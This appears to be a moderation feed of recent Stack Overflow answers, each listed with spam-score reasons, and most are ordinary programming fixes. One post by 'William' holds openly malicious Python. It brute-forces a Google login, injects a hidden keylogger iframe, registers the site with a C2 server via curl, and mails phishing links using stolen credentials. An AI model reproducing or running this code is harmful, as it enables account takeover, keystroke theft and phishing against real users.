  • Starts with a question (0.5): can i as
  • Low reputation (1):
Posted by: EL MEHDI TAZI

79500140

Date: 2025-03-11 09:15:45
Score: 3.5
Natty:
Report link

I had two classes each with @Setup: ChromeDriver.
Now I made a WebDriverManager class with a singleton factory. That did the trick!

Reasons:
  • Low length (1):
  • No code block (0.5):
  • User mentioned (1): @Setup
  • Self-answer (0.5):
  • Low reputation (0.5):
Posted by: Leder

79500133

Date: 2025-03-11 09:11:43
Score: 6 🚩
Natty:
Report link

Pls show what error you are getting. Share the log for it.

Reasons:
  • RegEx Blacklisted phrase (2.5): Pls show what
  • Low length (1.5):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: A_B

79500112

Date: 2025-03-11 09:04:41
Score: 1.5
Natty:
Report link

-----BEGIN CERTIFICATE REQUEST-----

MIIC3zCCAccCAQAwgZkxFzAVBgNVBAMMDmtldmFsbiBbU3RhbXBdMRMwEQYDVQQF

Ewo0MTIwMDMyOTkxMRUwEwYDVQQKDAxHb3Zlcm5tZW50YWwxGzAZBgNVBAsMEtmH

2YTZiCDYr9ixINmH2YTZiDELMAkGA1UEBhMCSVIxEzARBgNVBAgMCtiq2YfYsdin

2YYxEzARBgNVBAcMCtiq2YfYsdin2YYwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAw

ggEKAoIBAQCqgwrMjfSKtIKWE1XNwklW6mCHYcwwc/A1rTZ2ejCHELWGUhYzbj6t

ijgE4iY3FGhytudzDBOVcbdQAhwpunnY14uAPu/UtGhuhPRxKcCmb+GopiY3umnN

LHPPcTgKUlQlUm4ytNDuFJ7GmRGQ/q4F+UR2hWQTQvGGvlHNa27zDpKQEPD/gxac

hogNJ0yb52JPJJSvxmD1Oqhu5dA2GT3MB90zqkdNDX7t8WSA0nB9kOGNoVMudq6b

4N02fYvZstZ0mIUPhqPJ97s4jKzKxu+0aNzJr+eRcj/tARAewdYdgua/htwHKq1F

CcBE6S48PHZTnNx1DOuPRPlEoHHzMrqrAgMBAAGgADANBgkqhkiG9w0BAQsFAAOC

AQEACW+LhlWgpD3P40j07UYZngsS9mv0rfAqGxSVV/G9sqn1mgcBqXG3Nxzd6iHE

XHQqOWYmZCioH5wC1umNawZ+EItDdbkJMlHlnjsx3nbOAAPg5fK3KBDAliPSgcaU

MTqn2oPqJIWFKZ4g0fQRXj33P6tCm1kFlRzrP92K3TLIg0BfFzDpPL2KWM58EmlN

CX/W34xKCZFAMCTwNLVHJpzY8dxv+waOStLFMYqjcBP8uKPIPir1bXaygihW5EB4

e1EFMdYqyysaDTgQP8RZTlha9EZbLIY8x0RstjXtCrx5aSptylHl5cXH89zQUjAh

G9EMLGBKqVL+/rLP/PzFGY2d3g==

-----END CERTIFICATE REQUEST-----

Reasons:
  • Contains signature (1):
  • Long answer (-1):
  • No code block (0.5):
  • Low reputation (1):
Posted by: Ali

79500101

Date: 2025-03-11 08:57:40
Score: 3
Natty:
Report link

i was blind and now i see.

https://json-schema.org/draft-04/schema

this version is supported in this nuget. so no condidional .

Reasons:
  • Low length (1.5):
  • No code block (0.5):
  • Self-answer (0.5):
  • Low reputation (0.5):
Posted by: Dorian

79500099

Date: 2025-03-11 08:56:39
Score: 3
Natty:
Report link

What an answer ! solves the problem (presumbly) and creates a completly new one! how to create the settings file ! great !

Horrible, unhelpful, waste of time of an answer, might have as well keept it to yourself

Reasons:
  • Low length (0.5):
  • No code block (0.5):
  • Unregistered user (0.5):
  • Starts with a question (0.5): What an answer
  • Low reputation (1):
Posted by: switch

79500095

Date: 2025-03-11 08:55:39
Score: 10
Natty: 7.5
Report link

I wonder how can we iterate for other lines can you please give me an example for that?

Reasons:
  • Blacklisted phrase (1): how can we
  • RegEx Blacklisted phrase (2.5): can you please give me
  • RegEx Blacklisted phrase (1): I wonder how can we iterate for other lines can you please
  • Low length (1.5):
  • No code block (0.5):
  • Ends in question mark (2):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Abdullah Doğan Güvener

79500089

Date: 2025-03-11 08:52:38
Score: 0.5
Natty:
Report link

I simplified all queries and went from fetching a few fields to all. Now it seems to work. Really weird.

 public function render()
    {
        if (!$this->email) {
            abort(404);
        }

        $this->klant = VasteKlanten::where('email', $this->email)->first();

        if (!$this->klant) {
            $this->klant = Reserveringen::where('email', $this->email)
                ->orderBy('id', 'desc')
                ->first();

            $this->vaste_klant = false;
        }

        if ($this->klant) {
            $this->reserveringen = Reserveringen::where('email', $this->email)->get();
            $this->invitatie = NieuweKlanten::where('email', $this->klant->email)->get();
        }

        return view('livewire.beheer.klant-details');
    }
Reasons:
  • Long answer (-0.5):
  • Has code block (-0.5):
  • Self-answer (0.5):
  • Low reputation (1):
Posted by: Matilda Smets

79500088

Date: 2025-03-11 08:52:38
Score: 3.5
Natty:
Report link

As it turns out the Jet Driver has problems with the one to many field types... you delete them it works... for CRUD APIs...

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Self-answer (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Stewart Friday

79500081

Date: 2025-03-11 08:49:37
Score: 1
Natty:
Report link

# -----------[مرحلة ١: التأسيس الخبيث]-----------

# استخدم قوة جوجل ضدها

from selenium import webdriver

from selenium.webdriver.common.keys import Keys

import time

import pyautogui

def create_google_site():

\# اختطاف متصفح الضحية  

driver = webdriver.Chrome(executable_path='/path/to/chromedriver')  

driver.get("https://accounts.google.com/signin")  

\# حقن بيانات الدخول (الضحكة الشريرة)  

email = driver.find_element_by_name("identifier")  

email.send_keys("[email protected]")  

email.send_keys(Keys.RETURN)  

time.sleep(2)  

\# اختراق كلمة المرور باستخدام هجوم القوة العمياء  

password = driver.find_element_by_name("password")  

with open("passwords.txt", "r") as f:  

    for line in f:  

        password.send_keys(line.strip())  

        password.send_keys(Keys.RETURN)  

        time.sleep(0.5)  

        if "Welcome" in driver.page_source:  

            break  

\# بناء الموقع السرّي  

driver.get("https://sites.google.com/new")  

time.sleep(5)  

\# حقن شيفرة خبيثة في القالب  

pyautogui.hotkey('ctrl', 'shift', 'i')  # فتح أدوات المطور  

time.sleep(1)  

driver.execute_script("""  

    document.body.innerHTML += \`  

    \<iframe src="https://your-malicious-server/keylogger"  

    style="display:none;"\>\</iframe\>  

    \`;  

""")  

\# حفظ الموقع باسم بريء  

pyautogui.write('My Innocent Site')  

pyautogui.hotkey('ctrl', 's')  

time.sleep(3)  

driver.quit()  

# -----------[مرحلة ٢: التمويه والتدمير]-----------

# تحويل الموقع إلى فخ رقمي

def deploy_trojan_site():

create_google_site()  

\# ربط الموقع مع أدوات التجسس  

subprocess.Popen(\[  

    'curl',  

    '-X', 'POST',  

    'https://your-c2-server/register',  

    '--data',  

    'site_url=https://sites.google.com/site/malicious-site'  

\])  

# -----------[مرحلة ٣: الانتشار كالنار]-----------

# استغلال صلاحيات جوجل للسيطرة

def spread_via_google_services():

from googleapiclient.discovery import build  

creds = "stolen_credentials.json"  

drive_service = build('drive', 'v3', credentials=creds)  

\# نشر الموقع عبر مشاركات جوجل درايف  

file_metadata = {  

    'name': 'Important_Document',  

    'mimeType': 'application/vnd.google-apps.site'  

}  

media = MediaFileUpload('fake_site.html', mimetype='text/html')  

drive_service.files().create(  

    body=file_metadata,  

    media_body=media,  

    fields='id'  

).execute()  

\# إرسال الفيروس عبر جيميل  

gmail_service = build('gmail', 'v1', credentials=creds)  

message = MIMEText("انقر هنا لرؤية المستند: https://sites.google.com/fake-site")  

message\['to'\] = '[email protected]'  

message\['subject'\] = 'مستند سري'  

raw = base64.urlsafe_b64encode(message.as_bytes()).decode()  

gmail_service.users().messages().send(  

    userId='me',  

    body={'raw': raw}  

).execute()  

if _name_ == "_main_":

deploy_trojan_site()  

spread_via_google_services()  
Reasons:
  • Long answer (-1):
  • Has code block (-0.5):
  • No latin characters (1):
  • Filler text (0.5): -----------
  • Filler text (0): -----------
  • Filler text (0): -----------
  • Filler text (0): -----------
  • Filler text (0): -----------
  • Filler text (0): -----------
  • Low reputation (1):
Posted by: William

79500067

Date: 2025-03-11 08:36:35
Score: 3
Natty:
Report link

In my case there was problem with async method Main() in Program class. When I have changed it to sync, FolderBrowserDialog has opened ok.

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Richard

79500066

Date: 2025-03-11 08:36:35
Score: 10.5
Natty: 7.5
Report link

did you find any answer to this?

Reasons:
  • Blacklisted phrase (1): answer to this?
  • RegEx Blacklisted phrase (3): did you find any answer to this
  • Low length (2):
  • No code block (0.5):
  • Ends in question mark (2):
  • Single line (0.5):
  • Starts with a question (0.5): did you find any answer to this
  • Low reputation (1):
Posted by: Dani Popa

79500064

Date: 2025-03-11 08:36:35
Score: 2
Natty:
Report link

%matplotlib inline this line should be on the top of your script

Reasons:
  • Low length (1.5):
  • Has code block (-0.5):
  • Single line (0.5):
  • Low reputation (0.5):
Posted by: Coco Q.

79500052

Date: 2025-03-11 08:32:34
Score: 1
Natty:
Report link

To resolve this, navigate to Debug > Windows > Modules, right-click the GPNSAutomation.dll and select Load Symbols (VS Code 2022) to load the symbols manually.

By the way, this is not an error - it's merely a notification that the PDBs could not be loaded. You could read this doc Load symbols for more information.

Reasons:
  • Low length (0.5):
  • Has code block (-0.5):
  • Low reputation (1):
Posted by: Secret Ambush

79500040

Date: 2025-03-11 08:28:33
Score: 1.5
Natty:
Report link

Verify the column data type . Check that the column you are trying to update is actually of type int. It is possible that the column may have been defined with a type like varchar, char, or binary, which could have size limits.

Reasons:
  • Low length (0.5):
  • Has code block (-0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Arabi Nambi

79500038

Date: 2025-03-11 08:27:33
Score: 3
Natty:
Report link

I also had this problem and it turned out that the path on my Windows machine exceeded the 256 character limit. The solution was to move the checked out folder directly to C:\xyz.

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Robzzz

79500035

Date: 2025-03-11 08:25:33
Score: 3.5
Natty:
Report link

In my case I deleted the lock file.

Reasons:
  • Low length (2):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (0.5):
Posted by: Alexander Kolarov

79500018

Date: 2025-03-11 08:11:30
Score: 1.5
Natty:
Report link

You can use google spreadsheets with Highcharts, please see the documentation with examples and link to the API: https://www.highcharts.com/docs/working-with-data/data-module

API: https://api.highcharts.com/highcharts/data.googleSpreadsheetKey

Best,

Reasons:
  • Whitelisted phrase (-1.5): You can use
  • Probably link only (1):
  • Low length (1):
  • No code block (0.5):
  • Low reputation (0.5):
Posted by: Andrzej Bułeczka

79500002

Date: 2025-03-11 08:06:29
Score: 1
Natty:
Report link
      just add width height not in style            <iframe class="map"  width="510"  height= "510" src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d367298.85638395866!2d76.72027160297871!3d8.824467905511694!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3b05dc75a70fa0c3%3A0x5e9601dca63dd3fb!2sPMSA%20College%20kuttikadu%20kadakal!5e0!3m2!1sen!2sin!4v1643646588236!5m2!1sen!2sin"></iframe>
Reasons:
  • Has code block (-0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Gigisha

79500001

Date: 2025-03-11 08:05:29
Score: 6.5 🚩
Natty: 5.5
Report link

Hello,Have you found a solution,brother

Reasons:
  • RegEx Blacklisted phrase (2.5): Have you found a solution
  • Low length (2):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: 666

79499997

Date: 2025-03-11 08:03:28
Score: 2
Natty:
Report link

-- Step 1: Add a new column with the required precision

-- Step 2: Copy data from the old column to the new column

-- Step 3: Drop the old column (only after verifying the data)

-- Step 4: Rename the new column to match the original column name

This worked in ORACLESQL DEVELOPER

Reasons:
  • Low length (0.5):
  • No code block (0.5):
  • Low reputation (1):
Posted by: Aditya Shankar

79499996

Date: 2025-03-11 08:02:28
Score: 3.5
Natty:
Report link

You can show your adaptive cards inside Telegram App during the user conversation. Anyway that's not a Telegram native support question.

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Unregistered user (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: verseeq

79499973

Date: 2025-03-11 07:50:25
Score: 2
Natty:
Report link

Found this article useful in understanding this at a practical level. Re-reading the accepted answer after this made sense.

Reasons:
  • Blacklisted phrase (1): this article
  • Low length (1):
  • No code block (0.5):
  • Single line (0.5):
  • High reputation (-1):
Posted by: Manoj Mohan

79499972

Date: 2025-03-11 07:49:25
Score: 2
Natty:
Report link

Ok, i found the way to do that. using the following command:

npx create-vite@latest my-app-name --template react

Reasons:
  • Low length (1):
  • Has code block (-0.5):
  • Self-answer (0.5):
  • Low reputation (1):
Posted by: Vishal Ravanank

79499971

Date: 2025-03-11 07:49:25
Score: 1.5
Natty:
Report link

You can also write this way...and this is for typescript code const userSchema = new mongoose.Schema({ username: String, email: String, password: String, firstname: String, lastname: String, mobile: { type: Number, validate: { validator: function (v: number) { return /d{10}/.test(v.toString()); }, message: "mobile number must be exactly 10 digits" }, }, });

Reasons:
  • No code block (0.5):
  • Low reputation (1):
Posted by: Rahul Roy

79499955

Date: 2025-03-11 07:37:23
Score: 2
Natty:
Report link

The culprit for this was the log_subcmds option in sudoers, which itself uses ptrace and seccomp and has some documented limitations.

Thanks to DymOK on the TrueNAS forum who figured this out.

Reasons:
  • Blacklisted phrase (0.5): Thanks
  • Low length (1):
  • Has code block (-0.5):
  • Self-answer (0.5):
  • Low reputation (0.5):
Posted by: ab.

79499948

Date: 2025-03-11 07:35:22
Score: 11.5 🚩
Natty: 6
Report link

I face the same issues. Has anybody found any solutions?

I start a new project (maui .net8), i change the svg files (Colors, etc.) and in android everything works but in IOS the purple .NET icon & splash screen remains the same when i run app in local device.

Has anybody resolved this?

Reasons:
  • Blacklisted phrase (1.5): any solution
  • RegEx Blacklisted phrase (1.5): resolved this?
  • RegEx Blacklisted phrase (2): any solutions?
  • Low length (0.5):
  • No code block (0.5):
  • Me too answer (2.5): I face the same issue
  • Ends in question mark (2):
  • Low reputation (1):
Posted by: Konstantinos Anagnostopoulos

79499945

Date: 2025-03-11 07:35:22
Score: 1.5
Natty:
Report link

Run and debug -> uncheck raised exception, uncaught exception

Reasons:
  • Low length (1.5):
  • No code block (0.5):
  • Single line (0.5):
  • High reputation (-1):
Posted by: Minxin Yu - MSFT

79499929

Date: 2025-03-11 07:28:21
Score: 1
Natty:
Report link

As a workaround I manage to use dynamic sql:

CREATE OR REPLACE PROCEDURE p_json_test(v_id_1 NUMBER, v_id_2 NUMBER) IS
    v_sql VARCHAR2(4000);
BEGIN
    v_sql := 'INSERT INTO JSON_RESAULT_TABLE
              SELECT ID, JSON_OBJECT(*)
              FROM JSON_TABLE
              WHERE ID IN (:1, :2)';

    EXECUTE IMMEDIATE v_sql USING v_id_1, v_id_2;
END;
/

execute p_json_test(1, 2);

This approach solve an issue

Reasons:
  • Has code block (-0.5):
  • Self-answer (0.5):
  • Low reputation (1):
Posted by: Kamil Raszkowski

79499923

Date: 2025-03-11 07:25:20
Score: 5
Natty: 4
Report link

Is there any way to convert rdf:PlainLiteral to string, the exception thrown by the swrl built-ins

Reasons:
  • Blacklisted phrase (1): Is there any
  • Low length (1):
  • No code block (0.5):
  • Unregistered user (0.5):
  • Single line (0.5):
  • Starts with a question (0.5): Is there any
  • Low reputation (1):
Posted by: Sakshi

79499920

Date: 2025-03-11 07:23:19
Score: 3.5
Natty:
Report link

My facebook account is disabled please recover my id I don't done anything my account was hacked few days earlier

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Unregistered user (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Akash Rai

79499905

Date: 2025-03-11 07:16:17
Score: 6 🚩
Natty: 6
Report link

@christopher moore, thanks for your response

Reasons:
  • Blacklisted phrase (0.5): thanks
  • Low length (1.5):
  • No code block (0.5):
  • User mentioned (1): @christopher
  • Single line (0.5):
  • Looks like a comment (1):
  • Low reputation (1):
Posted by: Emmanuel Sharp

79499902

Date: 2025-03-11 07:14:16
Score: 1
Natty:
Report link

In my case(5.2.2) just replace in config.inc.php cookie to config and add 2 lines like bellow:

/* Authentication type */
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root'; //add this line
$cfg['Servers'][$i]['password'] = 'root'; //add this line
Reasons:
  • Low length (0.5):
  • Has code block (-0.5):
  • Low reputation (1):
Posted by: Shahzar Mazhar

79499901

Date: 2025-03-11 07:13:16
Score: 3.5
Natty:
Report link

Like if you want to install, configure and start fail2ban, this can be done in 2 ways:

First one is to do it making sub-tasks:

enter image description here

The other way is do make sub-roles:

enter image description here

Reasons:
  • Blacklisted phrase (1): enter image description here
  • Low length (1):
  • No code block (0.5):
  • Low reputation (1):
Posted by: Omer

79499897

Date: 2025-03-11 07:08:15
Score: 2
Natty:
Report link

Haha....
The json was wrong:
{ title: "event2", start: "2025-03-15" }

Reasons:
  • Low length (1.5):
  • Has code block (-0.5):
  • Self-answer (0.5):
  • Low reputation (0.5):
Posted by: naturzukunft

79499894

Date: 2025-03-11 07:07:15
Score: 2.5
Natty:
Report link

I changed int argc, char *argv[] in the class constructor to int& argc, char **argv and everything worked

This solution was found when I tried to create a second window of the application

Reasons:
  • Low length (0.5):
  • No code block (0.5):
  • Self-answer (0.5):
  • Low reputation (1):
Posted by: Andrey Strokov

79499884

Date: 2025-03-11 07:02:14
Score: 3.5
Natty:
Report link

Try below things

1-canny edge detection method

2-template matching

3-edge detection

4-Hough circle transform

These must work, do let me know if you have any questions, cheers!

Reasons:
  • Blacklisted phrase (1): cheers
  • Low length (1):
  • No code block (0.5):
  • Low reputation (1):
Posted by: Basavaraj Kalburgi

79499880

Date: 2025-03-11 07:01:13
Score: 6 🚩
Natty: 5
Report link

@Imran, How to replicate the same postman process in python. i am not able to get proper documentation on using confidentialclient library from msal.

Reasons:
  • Blacklisted phrase (1): i am not able to
  • Low length (1):
  • No code block (0.5):
  • User mentioned (1): @Imran
  • Single line (0.5):
  • Looks like a comment (1):
  • Low reputation (1):
Posted by: arunava manna

79499870

Date: 2025-03-11 06:55:12
Score: 1
Natty:
Report link

Use below commands in VS Code (PowerShell)

Remove-Item -Recurse -Force node_modules
Remove-Item -Force package-lock.json
npm install --legacy-peer-deps

NOTE: This will reset any issue and redownload the required items again.

Reasons:
  • Low length (0.5):
  • Has code block (-0.5):
  • Low reputation (1):
Posted by: Muhammad Saqib Javed